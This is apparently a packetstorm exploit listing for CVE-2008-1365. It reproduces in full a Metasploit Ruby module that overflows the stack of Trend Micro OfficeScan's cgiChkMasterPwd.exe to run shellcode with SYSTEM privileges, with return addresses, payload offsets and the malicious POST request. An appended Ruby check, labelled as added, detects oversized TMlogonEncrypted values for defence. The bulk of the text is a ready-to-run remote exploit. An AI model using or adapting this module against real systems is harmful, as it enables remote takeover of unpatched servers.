Trend Micro OfficeScan Remote Stack Overflow

26 Nov 2009 00:00:00 | Reported by toto | Type: packetstorm | Source: packetstormsecurity.com

Trend Micro OfficeScan Remote Stack Overflow exploi

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2008-1365 | 9 May 2010 00:00 | circl |
| Check Point Advisories | Trend Micro OfficeScan CGI Password Decryption Buffer Overflow (CVE-2008-1365) | 25 Nov 2009 00:00 | checkpoint_advisories |
| CVE | CVE-2008-1365 | 17 Mar 2008 22:00 | cve |
| Cvelist | CVE-2008-1365 | 17 Mar 2008 22:00 | cvelist |
| Exploit DB | Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit) | 9 May 2010 00:00 | exploitdb |
| Kaspersky | KLA10370 DoS vulnerability in OfficeScan | 17 Mar 2008 00:00 | kaspersky |
| Metasploit | Trend Micro OfficeScan Remote Stack Buffer Overflow | 9 Sep 2007 22:56 | metasploit |
| NVD | CVE-2008-1365 | 17 Mar 2008 22:44 | nvd |
| Prion | Stack overflow | 17 Mar 2008 22:44 | prion |
| Saint | Trend Micro OfficeScan Policy Server CGI buffer overflow | 3 Mar 2008 00:00 | saint |
```ruby
require 'msf/core'
require 'metasm'


class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Trend Micro OfficeScan Remote Stack Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in Trend Micro OfficeScan
        cgiChkMasterPwd.exe (running with SYSTEM privileges).

      },
      'Author'         => [ 'toto' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2008-1365' ],
          [ 'OSVDB', '42499' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'MinNops'  => 0,
          'MaxNops'  => 0,
          'Space'    => 498,
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
          # clean up to prevent crash on exit
          'Prepend'  => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov dword ptr fs:[0], 0").encode_string,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # return addresses need to be alphanumeric (here in loadhttp data section)
          [ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ],
        ],
      'DisclosureDate' => 'Jun 28 2007',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8080),
      ], self.class)
  end

  def exploit
    geip_src = "
      push esi
      push esp
      pop eax
      xor esi, [eax]
      push esi
      pop eax
      xor eax, got_eip
      push eax
      pop ecx
    got_eip:
    "

    sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src)

    sc.base_addr = target['Rets'][0]
    get_eip = sc.encode_string

    pat = Rex::Text.rand_text_alphanumeric(1016)

    pat[0, get_eip.length] = get_eip
    pat[14, payload.encoded.length] = payload.encoded
    pat[512, 4] = [target['Rets'][1]].pack('V') # string pointer (to prevent a crash)
    pat[524, 4] = [target['Rets'][0]].pack('V') # sets EIP to the address where the shellcode has been copied
    pat[540, 4] = [target['Rets'][0]-1].pack('V') # shellcode will be copied at this address (+1)

    data = "TMlogonEncrypted=!CRYPT!" + pat
    len = sprintf("%u", data.length);

    print_status("Trying target address 0x%.8x..." % target['Rets'][0])

    res = send_request_cgi({
      'uri'          => '/officescan/console/cgi/cgiChkMasterPwd.exe',
      'method'       => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data'         => data,
    }, 5)

    handler
  end

end
```
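For detection, the request this module sends has a recognisable shape: a POST to cgiChkMasterPwd.exe carrying a `TMlogonEncrypted=!CRYPT!` value of 1016 bytes. The Ruby check below is an added example, not part of the packetstorm module or of Metasploit; the `Request` struct, the function names and the 512-byte cut-off (chosen from the module's first overwrite offset) are assumptions, and the sample requests are constructed.

```ruby
require 'uri'

# Path and parameter as they appear in the module above (path compared lower-cased).
TARGET_PATH = '/officescan/console/cgi/cgichkmasterpwd.exe'
PARAM       = 'TMlogonEncrypted'
PREFIX      = '!CRYPT!'
# Assumption: 512 is used as the cut-off because the module writes its first
# pointer at offset 512 of the value; tune it to the longest value your console sends.
MAX_BLOB_LEN = 512

Request = Struct.new(:verb, :path, :body) # hypothetical minimal request record

# Percent-decode; fall back to the raw text if the encoding is malformed.
def lenient_decode(text)
  URI.decode_www_form_component(text)
rescue ArgumentError
  text
end

# Returns nil for requests that look normal, or a Hash describing the finding.
def inspect_request(req)
  return nil unless req.verb.to_s.casecmp?('POST')
  path = lenient_decode(req.path.to_s.split('?', 2).first.to_s).downcase
  return nil unless path == TARGET_PATH

  req.body.to_s.split('&').each do |pair|
    name, value = pair.split('=', 2)
    next unless value && lenient_decode(name.to_s) == PARAM
    decoded = lenient_decode(value)
    blob = decoded.delete_prefix(PREFIX)
    next if blob.bytesize < MAX_BLOB_LEN
    return { param: PARAM, crypt_prefix: decoded.start_with?(PREFIX),
             blob_length: blob.bytesize }
  end
  nil
end

# Constructed sample requests (not captured traffic).
SAMPLES = [
  Request.new('POST', '/officescan/console/cgi/cgiChkMasterPwd.exe', "TMlogonEncrypted=!CRYPT!#{'A' * 64}"),
  Request.new('POST', '/officescan/console/cgi/cgiChkMasterPwd.exe', "TMlogonEncrypted=!CRYPT!#{'A' * 1016}"),
  Request.new('post', '/OfficeScan/console/CGI/cgiChkMasterPwd.exe?x=1', "a=b&TMlogonEncrypted=%21CRYPT%21#{'B' * 600}")
].freeze
SAMPLES.each { |r| puts "#{r.path}: #{inspect_request(r).inspect}" }
```

The same length rule can be carried into a reverse proxy or IDS signature in front of the OfficeScan console; the percent-decoding step matters there too, since the prefix may arrive encoded.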
